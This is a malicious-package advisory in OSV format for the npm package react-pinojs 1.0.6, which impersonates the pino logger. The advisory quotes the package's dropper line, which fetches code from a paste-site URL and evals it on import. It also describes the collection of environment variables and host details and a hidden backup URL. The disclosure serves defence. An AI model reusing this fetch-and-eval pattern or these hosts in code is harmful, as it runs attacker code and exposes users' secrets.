MAL-2026-5488

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/react-pinojs/MAL-2026-5488.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5488

Published

2026-06-09T21:31:27Z

Modified

2026-06-09T21:46:29.657591528Z

Summary

Malicious code in react-pinojs (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (db767edd3581eec08793cb669f0ec59351e61f31501b6d4287b86baea512bb63)

Package impersonates the popular pino logger (homepage points to getpino.io, description mimics pino's tagline) and executes a remote-code-execution dropper on import. lib/writer.js — loaded transitively by the main entry pino.js — performs require('axios').get('https://www.jsonkeeper.com/b/MYUKZ').then(r => { eval(r.data.content_o); }), passing arbitrary attacker-controlled JavaScript fetched from an anonymous, mutable paste host directly to eval at module load time. Before the eval fires, writer.js assembles a data object containing the full process.env, os.platform(), os.hostname(), os.userInfo().username, and non-internal MAC addresses, which is in scope for the eval'd payload. A second hex-encoded channel is hidden in writer.js: byte arrays decode to the strings 'axios', 'get', 'then', and the URL https://www.jsonkeeper.com/b/HY6M6 — a backup fetch endpoint concealed from trivial source greps. Any project that runs require('react-pinojs') (or imports it) executes attacker-controlled code with access to the installer's environment variables, hostname, username, and MAC addresses.

Database specific

{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-06-09T21:31:27Z",
            "versions": [
                "1.0.6"
            ],
            "sha256": "db767edd3581eec08793cb669f0ec59351e61f31501b6d4287b86baea512bb63",
            "id": "IN-MAL-2026-005247",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T21:37:56.744147039Z"
        }
    ]
}

References

https://www.npmjs.com/package/react-pinojs/v/1.0.6

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / react-pinojs

Package

Name: react-pinojs; View open source insights on deps.dev
Purl: pkg:npm/react-pinojs

Affected ranges

Affected versions

1.*

1.0.6

Database specific

indicators

{
    "evidence_files": [
        {
            "sha256": "b6d314d7ec721484bb7a6d72c9dc580e8b9e9d53ca459480f98a20366b823c7d",
            "tlsh": "781120a2c392a414223017f248db4820bee5f35120d3418cbebc8ada2bf39e17154fa8",
            "path": "lib/writer.js"
        },
        {
            "sha256": "3d5bec867b573c4184c8640f1690df68c995d29527c25e2366161d5416293ce6",
            "tlsh": "1201bd10cd788d6308f828919c290187aa609c5b581cbd5d73d3631c0f4e5bf15ba16d",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-asMwMjTL2bDYtIH7kYErA1jWdgHpY8qd77qHyni4T+Gfn8WoXUJ4lm07sOI47yqvgaFLFvCs+vH/U61Ckj0NdA==",
                "sha1": "1c3d3d0b4b04a4c6c4750d62e884ce7f19f8e4ed"
            },
            "filename": "react-pinojs-1.0.6.tgz"
        }
    ]
}

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/react-pinojs/MAL-2026-5488.json"

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]